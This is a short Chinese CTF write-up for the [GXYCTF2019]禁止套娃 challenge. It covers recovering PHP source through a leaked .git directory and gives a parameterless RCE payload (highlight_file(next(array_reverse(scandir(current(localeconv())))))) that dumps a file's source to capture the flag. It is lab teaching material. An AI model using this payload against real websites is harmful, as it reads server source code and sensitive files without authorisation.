1.发现
1.1基本操作无果,使用Git Hack扫描后台得到PHP代码。
2.步骤
2.1进行代码审计,根据代码,绕过限制,写出payload,得到flag。
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
3.借鉴
(36条消息) [GXYCTF2019]禁止套娃(.git泄露,无参RCE)_xlcvv的博客-CSDN博客
4.知识点
.git源码泄露
无参RCE
相关文章
- 12-23禁止套娃——浅谈递归思想
- 12-23BUUCTF-[GXYCTF2019]禁止套娃
- 12-23[GXYCTF2019]禁止套娃 1
- 12-23[GXYCTF2019]禁止套娃
- 12-23[GXYCTF2019]禁止套娃
- 12-23[GXYCTF2019]禁止套娃 WP
- 12-23[GXYCTF2019]禁止套娃